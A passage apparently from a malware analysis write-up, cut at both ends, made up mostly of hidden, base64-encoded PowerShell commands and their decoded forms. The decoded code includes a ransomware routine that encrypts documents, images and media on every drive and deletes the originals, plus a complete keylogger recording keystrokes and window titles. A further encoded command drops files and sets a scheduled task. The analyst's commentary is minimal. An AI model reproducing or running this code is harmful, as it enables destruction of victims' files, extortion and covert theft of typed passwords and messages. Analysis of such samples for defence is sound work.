wBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAZABmACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAHAANAAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AbQBwADMAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAG0AbwB2ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAGsAdgAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABuAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAcwB0ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAY...
The second encoded command uses the same encoding and hidden options and contains the following PowerShell instructions
$pass=('IwBHAG8ANwBSADcAcABlAGQAQgB5AHcAYQB6AGkAeAAjAA==')
$drives = 65..90 | foreach {[char]$_}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpeg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.docx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.doc")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xlsx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xls")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.ppt")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.pdf")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp4")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp3")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mov")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mkv")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
Invalid character in input stream.
This set of commands encrypts several set of files and removes the original file.
powershell -win hidden -enc IAAkAGwAbwBvAHQAIAA9ACAAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAIAArACAAIgBcAGQAeQBuAGEAXABsAG8AbwB0AFwASwBlAHkAbABvAGcAXAAiACkAOwAgAG0AZAAgACQAbABvAG8AdAAKAGYAdQBuAGMAdABpAG8AbgAgAEQAeQBuAEEAbQBpAHQAZQAtAEsAZQB5ACAAewAkAGQAYQB0AGUAYQBuAGQAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZAAtAEgASAAtAG0AbQA7ACAAJAB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIABIAEgALQBtAG0ACgBBAGQAZAAtAFQAeQBwAGUAIABAACIAIAAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7ACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABVAHMAZQByAFcAaQBuAGQAbwB3AHMAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIAAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AH0AIAAKACIAQAAKACAAIAAgACAAJABsAG8AZwBmAGkAbABlACAAPQAgACQAbABvAG8AdAAgACsAIAAiAGsAZQB5AGwAbwBnAF8AIgAgACsAIAAiACQAZABhAHQAZQBhAG4AZAB0AGkAbQBlACIAKwAgACIALgBsAG8AZwAiAAoAIAAgACAAIAAkAE0AQQBQAFYASwBfAFYASwBfAFQATwBfAFYAUwBDACAAPQAgADAAeAAwADAACgAJACQATQBBAFAAVgBLAF8AVgBTAEMAXwBUAE8AXwBWAEsAIAA9ACAAMAB4ADAAMQAKAAkAJABNAEEAUABWAEsAXwBWAEsAXwBUAE8AXwBDAEgAQQBSACAAPQAgADAAeAAwADIACgAJACQATQBBAFAAVgBLAF8AVgBTAEMAXwBUAE8AXwBWAEsAXwBFAFgAIAA9ACAAMAB4ADAAMwAKAAkAJABNAEEAUABWAEsAXwBWAEsAXwBUAE8AXwBWAFMAQwBfAEUAWAAgAD0AIAAwAHgAMAA0AAoACQAkAHYAaQByAHQAdQBhAGwAawBjAF8AcwBpAGcAIAA9ACAAQAAnAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8ALAAgAEUAeABhAGMAdABTAHAAZQBsAGwAaQBuAGcAPQB0AHIAdQBlACkAXQAgAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAcwBoAG8AcgB0ACAARwBlAHQAQQBzAHkAbgBjAEsAZQB5AFMAdABhAHQAZQAoAGkAbgB0ACAAdgBpAHIAdAB1AGEAbABLAGUAeQBDAG8AZABlACkAOwAgAAoAJwBAAAoACQAkAGsAYgBzAHQAYQB0AGUAXwBzAGkAZwAgAD0AIABAACcACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGsAZQB5AHMAdABhAHQAZQApADsACgAnAEAACgAJACQAbQBhAHAAYwBoAGEAcgBfAHMAaQBnACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAHUAaQBuAHQAIAB1AEMAbwBkAGUALAAgAGkAbgB0ACAAdQBNAGEAcABUAHkAcABlACkAOwAKACcAQAAKAAkAJAB0AG8AdQBuAGkAYwBvAGQAZQBfAHMAaQBnACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUAKAB1AGkAbgB0ACAAdwBWAGkAcgB0AEsAZQB5ACwAIAB1AGkAbgB0ACAAdwBTAGMAYQBuAEMAbwBkAGUALAAgAGIAeQB0AGUAWwBdACAAbABwAGsAZQB5AHMAdABhAHQAZQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAHAAdwBzAHoAQgB1AGYAZgAsACAAaQBuAHQAIABjAGMAaABCAHUAZgBmACwAIAB1AGkAbgB0ACAAdwBGAGwAYQBnAHMAKQA7AAoAJwBAAAoACQAkAGcAZQB0AEsAZQB5AFMAdABhAHQAZQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHYAaQByAHQAdQBhAGwAawBjAF8AcwBpAGcAIAAtAG4AYQBtAGUAIAAiAFcAaQBuADMAMgBHAGUAdABTAHQAYQB0AGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAJABnAGUAdABLAEIAUwB0AGEAdABlACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0ATQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAawBiAHMAdABhAHQAZQBfAHMAaQBnACAALQBuAGEAbQBlACAAIgBXAGkAbgAzADIATQB5AEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAJABnAGUAdABLAGUAeQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG0AYQBwAGMAaABhAHIAXwBzAGkAZwAgAC0AbgBhAG0AZQAgACIAVwBpAG4AMwAyAE0AeQBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAFQAaAByAHUACgAJACQAZwBlAHQAVQBuAGkAYwBvAGQAZQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQAbwB1AG4AaQBjAG8AZABlAF8AcwBpAGcAIAAtAG4AYQBtAGUAIAAiAFcAaQBuADMAMgBNAHkAVABvAFUAbgBpAGMAbwBkAGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADQAMAAKACQAVABvAHAAVwBpAG4AZABvAHcAIAA9ACAAWwBVAHMAZQByAFcAaQBuAGQAbwB3AHMAXQA6ADoARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwAgACQAVwBpAG4AZABvAHcAVABpAHQAbABlACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUAIAAtAGUAcQAgACQAVABvAHAAVwBpAG4AZABvAHcAIAB9ACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAKACQAbABvAG8AdAAgAD0AIAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAgACsAIAAiAFwAZAB5AG4AYQBcAGwAbwBvAHQAXABLAGUAeQBsAG8AZwBcACIAKQA7ACAAbQBkACAAJABsAG8AbwB0AAkACQAKACQAZwBvAHQAaQB0ACAAPQAgACIAIgAKAAkACQBmAG8AcgAgACgAJABjAGgAYQByACAAPQAgADEAOwAgACQAYwBoAGEAcgAgAC0AbABlACAAMgA1ADQAOwAgACQAYwBoAGEAcgArACsAKQAgAHsAJAB2AGsAZQB5ACAAPQAgACQAYwBoAGEAcgAKAAkACQAJACQAZwBvAHQAaQB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAJAB2AGsAZQB5ACkACgAJAAkAaQBmACAAKAAkAGcAbwB0AGkAdAAgAC0AZQBxACAALQAzADIANwA2ADcAKQAgAHsAJABsAF8AcwBoAGkAZgB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAMQA2ADAAKQAKAAkACQAJAAkAJAByAF8AcwBoAGkAZgB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAMQA2ADEAKQAKAAkACQAJAAkAJABjAGEAcABzAF8AbABvAGMAawAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrAAoACQAJAAkACQAkAHMAYwBhAG4AYwBvAGQAZQAgAD0AIAAkAGcAZQB0AEsAZQB5ADoAOgBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAJAB2AGsAZQB5ACwAIAAkAE0AQQBQAFYASwBfAFYAUwBDAF8AVABPAF8AVgBLAF8ARQBYACkACgAJAAkACQAJACQAawBiAHMAdABhAHQAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAyADUANgAKAAkACQAJAAkAJABjAGgAZQBjAGsAawBiAHMAdABhAHQAZQAgAD0AIAAkAGcAZQB0AEsAQgBTAHQAYQB0AGUAOgA6AEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKAAkAGsAYgBzAHQAYQB0AGUAKQAKAAkACQAJAAkAJABtAHkAYwBoAGEAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIgA7AAoACQAJAAkACQAkAHUAbgBpAGMAbwBkAGUAXwByAGUAcwAgAD0AIAAkAGcAZQB0AFUAbgBpAGMAbwBkAGUAOgA6AFQAbwBVAG4AaQBjAG8AZABlACgAJAB2AGsAZQB5ACwAIAAkAHMAYwBhAG4AYwBvAGQAZQAsACAAJABrAGIAcwB0AGEAdABlACwAIAAkAG0AeQBjAGgAYQByACwAIAAkAG0AeQBjAGgAYQByAC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAwACkACgAJAAkACQAJAGkAZgAgACgAJAB1AG4AaQBjAG8AZABlAF8AcgBlAHMAIAAtAGcAdAAgADAAKQAgAHsATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGwAbwBnAGYAaQBsAGUAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAbgBpAGMAbwBkAGUAIAAtAEEAcABwAGUAbgBkACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAoACQAdABpAG0AZQAgACsAIAAiACAAIgAgACsAIAAkAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQApACwAIAAkAG0AeQBjAGgAYQByAC4AVABvAFMAdAByAGkAbgBnACgAKQAJAAkACQAJAH0ACQAJAAkAfQAJAAkAfQAJAH0AfQAKAAoARAB5AG4AQQBtAGkAdABlAC0ASwBlAHkAIAAKAA==
Which once decoded is:
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
function DynAmite-Key {$dateandtime = Get-Date -Format yyyy-MM-dd-HH-mm; $time = Get-Date -Format HH-mm
Add-Type @"
using System; using System.Runtime.InteropServices; public class UserWindows {[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();}
"@
$logfile = $loot + "keylog_" + "$dateandtime"+ ".log"
$MAPVK_VK_TO_VSC = 0x00
$MAPVK_VSC_TO_VK = 0x01
$MAPVK_VK_TO_CHAR = 0x02
$MAPVK_VSC_TO_VK_EX = 0x03
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {Start-Sleep -Milliseconds 40
$TopWindow = [UserWindows]::GetForegroundWindow(); $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
$gotit = ""
for ($char = 1; $char -le 254; $char++) {$vkey = $char
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767) {$l_shift = $getKeyState::GetAsyncKeyState(160)
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0) {Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject ($time + " " + $WindowTitle), $mychar.ToString() } } }}}
DynAmite-Key
This is a Keylogger implemented with PowerShell. Very interesting usage of PowerShell :-)
powershell -win hidden -enc JABsAG8AbwB0ACAAPQAgACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACAAKwAgACIAXABkAHkAbgBhAFwAIgApADsAIABtAGQAIAAkAGwAbwBvAHQACgBjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAcgBlAHMALgBjAHIAdAAgACgAJABsAG8AbwB0ACAAKwAgACIAcgBlAHMAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAawBsAC4AYwByAHQAIAAoACQAbABvAG8AdAAgACsAIAAiAGsAbAAuAGUAeABlACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHMAdAAuAGMAcgB0ACAAKAAkAGwAbwBvAHQAIAArACAAIgBzAHQALgBlAHgAZQAiACkAOwAgACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGMAcgB5AC4AYwByAHQAIAAoACQAbABvAG8AdAAgACsAIAAiAGMAcgB5AC4AZQB4AGUAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAdAAxAC4AYwByAHQAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADEALgB4AG0AbAAiACkAOwAgAGMAZQByAHQAdQB0AGkAbAAgAC0AZABlAGMAbwBkAGUAIAB0ADIALgBjAHIAdAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQAMgAuAHgAbQBsACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHQAMwAuAGMAcgB0ACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAAzAC4AeABtAGwAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAdAA0AC4AYwByAHQAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADQALgB4AG0AbAAiACkAOwAgAGMAZQByAHQAdQB0AGkAbAAgAC0AZABlAGMAbwBkAGUAIAB0ADUALgBjAHIAdAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQANQAuAHgAbQBsACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGIAZAAuAGMAcgB0ACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBkAC4AZQB4AGUACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AYwByAGUAYQB0AGUAIAAvAFQATgAgA